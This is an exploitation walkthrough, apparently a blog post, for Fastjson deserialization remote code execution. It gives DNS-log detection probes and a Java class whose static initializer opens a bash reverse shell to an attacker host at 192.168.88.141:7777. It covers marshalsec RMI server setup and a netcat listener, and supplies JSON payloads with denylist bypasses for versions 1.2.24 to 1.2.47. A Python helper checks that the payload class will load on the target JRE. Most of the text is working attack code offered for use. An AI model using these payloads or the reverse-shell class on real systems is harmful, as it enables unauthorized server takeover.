1. Detecting Fastjson 1.2.67 and below
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
Replace dnslog with your own DNS-log subdomain. Fastjson's built-in InetAddress codec resolves val, so a DNS query arriving at the log means the target parsed the input. The probe does not always fire (for example when the target has no outbound DNS), so silence on its own does not prove the target is patched.
2. Exploitation
The test environment was set up with Docker.
2.1 Generating the PoC
The file below pops a reverse shell. For a DNS-log check instead, replace the command array with this line:
String[] commands = {"ping", "eqkkk1.dnslog.cn"};
Create a file TouchFile.java. The payload lives in a static initializer, so it runs the moment the JVM loads the class, which is exactly what the JNDI lookup below triggers:
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // Reverse shell back to the attacker's VPS; swap in the ping line above for a DNS-log check
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.88.141/7777 0>&1"};
            Process pc = rt.exec(commands);
            // Blocks the target's request thread until the shell exits, so the HTTP request appears to hang
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
2.2 Compile the file to produce TouchFile.class
javac TouchFile.java
Compile with a JDK no newer than the target's JRE (or pass -source/-target for the target's release): a class file with a newer major version is rejected with UnsupportedClassVersionError and the static block never runs.
2.3 Start a web server so the freshly generated TouchFile.class can be fetched (the RMI server below points at port 3333).
2.4 Use marshalsec-0.0.3-SNAPSHOT-all.jar to run the RMI reference server. I put this tool and the .class file on the same VPS:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.141:3333/#TouchFile" 9999
This serves a JNDI Reference on port 9999 whose codebase is the HTTP server, and the target's JVM fetches and loads TouchFile from there. Remote codebase loading over RMI only works when the target JVM is older than 8u121/7u131/6u141 or has com.sun.jndi.rmi.object.trustURLCodebase set to true (the LDAP equivalent was switched off in 8u191).
2.5 Listen on port 7777 (for example with netcat).
2.6 Visit the target site, change GET to POST, and put the exp in the request body.
Fastjson 1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.88.141:9999/TouchFile","autoCommit":true}}
[Screenshot: the request is still hanging with no response, because pc.waitFor() holds the thread until the shell exits]
[Screenshot: the request can also be sent this way]
[Screenshot: reverse shell received on port 7777]
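If the RMI server logs the lookup but no shell ever comes back, the usual culprit is step 2.2: a TouchFile.class compiled by a newer JDK than the target's JRE is rejected before its static initializer runs. The following is an added example (not code from the original post) that reads the class-file header and reports whether a given Java release can load it; the file name and the sample headers are constructed for illustration.

```python
# Added example (not from the original post): check that a compiled .class will
# load on the target's JRE before serving it over HTTP. File names are assumptions.
import struct
import sys

CLASS_MAGIC = b"\xca\xfe\xba\xbe"


def class_file_version(data: bytes) -> tuple:
    """Return (major, minor) from a class-file header; raise on bad magic."""
    if len(data) < 8 or data[:4] != CLASS_MAGIC:
        raise ValueError("not a Java class file")
    minor, major = struct.unpack(">HH", data[4:8])  # minor precedes major in the header
    return major, minor


def java_release(major: int) -> str:
    """Map a class-file major version to the Java release that produced it.
    The relation is major = 44 + release (45 = Java 1.1 ... 52 = Java 8, 55 = Java 11)."""
    if major < 45:
        raise ValueError("major version %d predates Java 1.1" % major)
    release = major - 44
    return "1.%d" % release if release <= 4 else str(release)


def loads_on(data: bytes, target_release: int) -> bool:
    """True if a JRE of the given release (e.g. 8) can load this class."""
    major, _ = class_file_version(data)
    return major <= 44 + target_release


def check_file(path: str, target_release: int) -> str:
    """Human-readable verdict for a .class on disk against a target Java release."""
    with open(path, "rb") as fh:
        data = fh.read(8)
    major, minor = class_file_version(data)
    verdict = "OK" if loads_on(data, target_release) else "TOO NEW, recompile with -target"
    return "%s: compiled for Java %s (major %d.%d), target Java %d -> %s" % (
        path, java_release(major), major, minor, target_release, verdict)


# Constructed sample headers (only the first 8 bytes matter for this check):
# javac from JDK 11 writes major 55 (0x37); JDK 8, or -target 1.8, writes 52 (0x34).
SAMPLE_JDK11_HEADER = CLASS_MAGIC + b"\x00\x00\x00\x37"
SAMPLE_JDK8_HEADER = CLASS_MAGIC + b"\x00\x00\x00\x34"

if __name__ == "__main__":
    # usage: python check_class.py TouchFile.class 8
    path = sys.argv[1] if len(sys.argv) > 1 else "TouchFile.class"
    target = int(sys.argv[2]) if len(sys.argv) > 2 else 8
    print(check_file(path, target))
```

Run it against the freshly compiled TouchFile.class with the target's Java release as the second argument; a "TOO NEW" verdict means recompiling with `-source`/`-target` (or `--release` on JDK 9+) for that release.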
For other versions everything above stays the same; only the exp in the request body changes.
1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
Unknown version (somewhere between 1.2.24 and 1.2.41): the plain payload. From 1.2.25 on, autoType is off by default and com.sun. is on the denylist, so if this form fails, move on to the bypasses below.
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.41 (needs autoTypeSupport enabled): the class name is wrapped as L...; so the startsWith denylist check does not match, while TypeUtils.loadClass strips the wrapper before loading
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.42 (needs autoTypeSupport enabled): 1.2.42 strips a single L/; pair before checking, so the wrapper is doubled
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.43 (needs autoTypeSupport enabled): 1.2.43 rejects names starting with LL, so the array-type prefix [ is used instead
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}
1.2.45 (needs autoTypeSupport enabled and MyBatis on the target's classpath): JndiDataSourceFactory was not yet on the denylist
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
1.2.47 (works with autoType at its default, off): the first object goes through the java.lang.Class deserializer, which loads JdbcRowSetImpl into the type cache; the second object is then resolved from the cache without the denylist check
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}